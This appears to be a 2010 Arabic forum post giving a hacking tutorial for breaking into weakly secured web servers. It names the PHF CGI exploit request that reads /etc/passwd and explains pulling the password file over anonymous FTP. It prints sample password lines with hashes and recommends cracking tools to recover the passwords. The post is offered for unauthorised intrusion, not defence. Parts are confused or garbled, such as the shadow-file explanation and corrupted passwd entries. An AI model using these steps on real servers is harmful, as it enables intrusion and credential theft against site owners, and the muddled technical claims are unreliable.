منتديات زيوس

إختراق المواقع 626202547


انضم إلى المنتدى ، فالأمر سريع وسهل

منتديات زيوس

إختراق المواقع 626202547

منتديات زيوس

هل تريد التفاعل مع هذه المساهمة؟ كل ما عليك هو إنشاء حساب جديد ببضع خطوات أو تسجيل الدخول للمتابعة.
منتديات زيوس

منتدى زيوس - برامج مجانية - ألعاب مجانية - كتب إلكترونية مجانية - برامج ستلايت - خلفيات وصور


    إختراق المواقع

    زيوس
    زيوس

    إختراق المواقع Stars13


    الجنس : ذكر
    عدد المساهمات : 1634
    تاريخ التسجيل : 12/03/2010
    المزاجشاعري

    نبض إختراق المواقع

    مُساهمة من طرف زيوس الجمعة يونيو 18, 2010 8:20 pm

    إختراق المواقع ماهو الا شئ بسيط ، نعم بسيط ولكن في حاله واحده وهي أن تتعرف على نظام التشغيل لسيرفر وهي مسأله في غايه البساطه والأمر الثاني ان تكون عالما بالثغرات الموجوده فيه ، وتكون المسأله صعبه إذا كنت تريد تريد إختراق مواقع كبيره ومشهوره ولها هيبه وحمايه عاليه حيث أنك في هذه الحاله سوف تنسى الثغرات الموجوده عندك عن النظام الخادم لهذا الموقع لأن وبالتأكيد قد رقعت وعليك أن تفكر في إكتشاف ثغره في هذا الموقع لتخترقه وهذه الناحيه لن أتحدث عنها لأني لا أعرفها ، ولكن سوف نتحدث عن البيسك سيرفر هو السيرفر الخادم لأكثر المواقع العربيه وهو سيرفر بسيط في الحمايه ,,,
    لإختراق هذا النوع من السيرفرات عليك التعرف على نظام التشغيل له ويتم ذلك من عده طريق لتعرف عليه
    مثلا نريد اختراق الموقع
    www.kondor.com
    وهذا موقع ليس مجاني بل هو نطاق له سيرفره ورقم آي بي ثابت وهذا شئ معلوم لدى الجميع
    نرسل رساله الى عنوان بريدي خاطئ الى هذا السيرفر وسوف يرد عليك بأن هذا البريد غير موجود في الموقع والبريد مثلا هو
    hgguutujfkerh@kondor.com
    وهو بالفعل غير موجود في الموقع عنوان بريد بالإسم هذا ، من خلال الرساله التي وصلتك تخبركبأن عنوان البريد هذا غير موجود تستطيع التعرف من خلالها على نظام الموقع ، وهذه واحده من الطرق
    ثانيا عليك الآن وبعد معرفه نظام التشغيل لهذا الموقع أن تبحث عن الثغرات له
    ////////////
    ////////////
    ملاحظه مهمه
    ////////////
    ////////////
    قد يخترق أحد المواقع ويكون السبب ليس نظام التشغيل ، بل يكون أحد البرامج المثبته عليه مثل ملفات سي حي آي وقد تستخدم لجلب ملف الباسورد المسمى دائما بـ passwd وهناك حادثه مثل هذه في إصدارات WWWThreads للمنتديات

    /////////////////////////////////////////////////

    لنفرض انك تبي تخترق سيرفر بسيط وقليل الأمن وهذا النوع منتشر بكثره بكثره نعم بكثره ، عندها سوف يكون إختراق هذا النوع والحصول على الباسورد فايل امر في غايه البساطه نعم في غايه البساطه ولاداعي بعد ان تخترق بأن تقول لمن يطلب منك جواب لسؤال .. كيف ؟ ان ترد عليه بأن العمليه معقده وهذا الرد كاذب
    مثلا أدخل على السيرفر في وضع التخفي
    anonymously (( إستخدم التلنت في هذه الخطوه ))
    وانظر الى المجلد المسمى بـ
    etc
    وأطلب الملف
    passwd
    هل رأيت ... هي عمليه بسيطه ولكن قف ! الملف يحتوي على كلم السر الخاصه بالموقع وغسماء المستخدمين للسيرفر وكلماتهم السريه ولكن كلماتهم السريه تكون مشفره
    طريقه أخرى لإختراق هذا النوع من السيرفرات
    أبحث في الموقع المستهدف من خلال المتصفح عن يا ترى وجود سي جي آي
    عند توفره أطلب الملف التالي
    cgi-bin/phf?Qalias=x
    /bin/cat /etc/passwd
    مثلا عنوان الموقع هو
    www.kondor.com
    نكتب هكذا
    www.kondor.com/cgi-bin/phf?Qalias=x
    /bin/cat /etc/passwd
    عندها سوف يرسل لك الملف
    passwd
    وسوف يكون في الملف إسماء وكلمات السر المرخص لهم دخول السيرفر ولكن قف هناك أمر حيرني كثيرا وجاب لي الصداع وحيث اني ذهبت لتصميم برامج لفك التشفير عن كلمات السر فهي مشفره وأنتهى الأمر بي البرنامج الذي صمم على يد أحدهم !

    الآن سوف أضع أسئله وأجوبه لتسهل الفهم
    س: ما الملف
    passwd
    وهل الحصول عليها يعتبر من الأشياء المسموح عرضها ؟
    ج: الملف
    passwd
    يحتوي كلمات السر وأسماء المستخدمين المسموح لهم دخول جهاز السيرفر وهو غير مسموح بعرضه ولكن هناك ثغرات وطرق ذكرنا بعضها أو القليل منا وسوف نذكر أكثر ، المهم عند حصولك على الملف سوف تشاهد مكتوب فيه هكذا مثلا


    Sources Code - شفرة

    root❌0:1:0000-Admin(0000):/:/bin/ksh
    daemon❌1:1:0000-Admin(0000):/:
    bin❌2:2:0000-Admin(0000):/usr/bin:
    listen❌37:4:Network Admin:/usr/net/nls:nobody:x:60001:60001:uid
    nobody:/:noaccess:x:60002:60002:uid noaccess:/:
    ftp❌101:4:
    FTPUser:/export/home/ftp:
    kondor:yu&rte6745kd:4:RichardClark:/export/home/kondor



    إحنا علينا من السطر هذا
    kondor:yu&rte6745kd:4:RichardClark:/export/home/kondor
    ولتفسيره نقول بأن
    إسم المستخدم هو
    kondor
    وكلمه السر المشفره .. حط خطين تحت كلمه مشفره هي
    yu&rte6745kd
    وايضا
    User number: 201
    Group Number: 4
    Real Name (usually): Richard Clark
    Home Directory: /export/home/rrc
    Type of Shell: /bin/ksh
    الآن فهمنا ماذ يعني السطر هذا السطر من الملف passwd
    kondor:yu&rte6745kd:4:RichardClark:/export/home/kondor

    حاولت أن تعرف من هذه شئ
    admin sign in:/:/bin/csh
    sysadm:ufcNtKNYj7m9I:0:0:
    Regular Admin login:/admin:/sbin/sh
    bin:*:2:2:Admin :/bin:
    sys:*:3:3:Admin :/usr/src:
    adm:*:4:4:Admin :/usr/adm:/sbin/sh
    daemon:*:1:1: Daemon Login for daemons needing
    nobody:*:65534:65534::/:
    ftp:*:39:39:FTP guest login:/var/ftp:
    dtodd:yYn1sav8tKzOI:101💯John Todd:/home/dtodd:/sbin/sh
    joetest:0IeSH6HfEEIs2:102💯:/home/joetest:/usr/bin/restsh
    س : هل اي ثغره تنجح ؟
    ج : لا طبعا ، لابد ان تكون عارفا لأي شئ هذه الثغره ولأي نظام تشغيل وهل يلزم أن يكون مع نظام التشغيل برنامج آخر ليتم الدخول على السيرفر أو على الروت ، وكل هذه المعلومات لابد من توفرها
    مثلا الموقع alsahat.net يعمل على نظام لينكس
    وقد يكون لثغره أن سبق ورقعت
    س : هل يختلف تشفير كلمه السر من نظام لآخر ؟
    ج : هذا شئ أكيد ...
    س : هل هناك برامج مخصصه لكلمات السر لكل نظام ؟
    ج : نعم ، مثلا برنامجي المفضل لكسر شفرات الكلمات السريه (passwd) لنظام يونكس هو Brute ولكن للأسف أنا لا أملكه الآن وهناك برنامج آخر قد يكون أفضل من سابقه وهو Cracker Jack 1.4
    )(
    إعذروني لن كان كلامي مو مرتب
    )(




    شكل الكلام والله مو مرتب ... عشان كذا بعيد أكتب لكم بتعمق أكثر والكلام اللي فوق هذا مجرد مقدمه
    بكتب بالعاميه ازين لي ولكم
    مو لازم تعرف الكلام الي سبق ذكرته لكن إفهم منه جواب السؤال :: كيف يتم :: فقط

    === نبداء من هنا وبعمق ===
    عرفنا ان الملف
    (سوف نسميه من الآن بإسم ملف الباسورد )passwd file
    يحتوي على إسماء المستخدمين المرخص لهم الدخول الى السيرفر وكلماتهم السريه وعرفنا أيضا أنها مشفره ولكن ضع كل تفكيره في الحصول على ملف الباسورد وأترك كيفت كسر التشفير في النهايه فهي تعتبر بسيطه
    فمتو كل اللي راح ,,,, تمام

    إستغلال الثغرات
    اولا ما هي الثغرات ,,, الثغرات هي حفر وهفوات في السفت وير فقط وتمكن أي شخص من الحصول على ماعلمومات أو نشر فيروسات من خلال هذه الثغره
    من ضمن هذه الثغرات ، ثغره سبق وذكرتها لكم في هذا المقال وهي في ملفات السي جي آي واستخدمناها لإختراق الموقع
    www.kondor.com
    ونورد عنها الآن تفاصيل
    تسمى هذه الثغره الأمنيه بـ
    PHF
    ومعظم السيرفرات تمتلك هذه الثغره والى الآن لم يتم رقعها مع الأسف (إذا وجد عنده سي جي آي فقط ) !:! إذا نجحت هذه الثغره فسوف يعرض لك ملف الباسورد ، زي هذا مثلا

    Sources Code - شفرة


    root❌0:1:0000-Admin(0000):/:/bin/ksh
    daemon❌1:1:0000-Admin(0000):/:
    bin❌2:2:0000-Admin(0000):/usr/bin:
    listen❌37:4:Network Admin:/usr/net/nls:nobody:x:60001:60001:uid
    nobody:/:noaccess:x:60002:60002:uid noaccess:/:
    ftp❌101:4:
    FTPUser:/export/home/ftp:
    kondor:yu&rte6745kd:4:RichardClark:/export/home/kondor





    كما ذكرنا سابقن (كتابه سابقاً هكذا سابقن أفضل ) لووول
    أحفظ الملف في تكست او مستند نص عشان تسوي له عمليات لكسر التشفير

    FTP Passwd
    بعض السيرفرات تحفظ ملف الباسورد في الإف تي بي نفسه ، أي تستطيع الى حد بعيد أن تحصل على ملف الباسورد من خلال دخولك في وصع مخفي
    anonymous logins
    والدخول بالوضع الخفي شئ قانوني ، وتسحب ملف الباسورد من الهدف المحدد ، غستخدم احد هذه البرامج لهمل ذلك
    WS FTP or CuteFTP
    وبعد ماتدخل بالوضع الخفي راح تجيك لسته أو قائمه
    إختر منها
    etc
    وراح يعرض لك عدد قليل من الملفات مثل هذا
    "group, passwd"
    وملف الباسورد مو شرط يكون إسمه
    passwd
    ممكن يكون غير كذا .. المهم أنت أسحبه وإفتحه ولو شفت إسم مثل
    "root, daemon, FTP, nobody, ftplogin, bin"
    وإذا لقيت بالقرب من هذه الكلمات رمز نجمه كهذه * وقد رمز آخر مثل علامه إكس فقط ، لن ينفعك الإستعانه بأحد الكراكر ولكن كل ماعليك أن تتعقب الباسورد ويجب ان تبحث لحل لهذه المشكله فأنا حتى تحصل على مثل هذا
    "joetest:0IeSH6HfEEIs2:102💯:/home/joetest:/usr/bin/restsh"
    والآن إستعن بأحد الكراكر لكسر كلمة السر او حاول عن طريق البرامج الذي ذكرتها لك سابقن

    س : ماهو إسم المستخد هنا وماهي كلمة السر المشفره ؟
    جاوب أنت .... !:!

    التعقب لملف الباسورد
    الآن وبعد أن حصلت على مثل هذا
    "joetest:*:102:100::/home/joetest:/usr/bin/restsh"
    فأنت الآن تملك
    shadowed passwd
    فهذا يتدلى في نظام التشفيل ولكن الـ
    passwd file
    يختلف (لا داعي لتعمق اكثر ) والملف
    passwd file
    هو الذي نجد كلمة السر فيه مشفره وليست رمز واحد مثل * أو x
    و الـ
    shadow file
    يكون مكان كلمة السر نجمه أو رمز
    وأنا الى الآن لست متأكد من هذه النقطه


      الوقت/التاريخ الآن هو الأحد أبريل 28, 2024 7:28 pm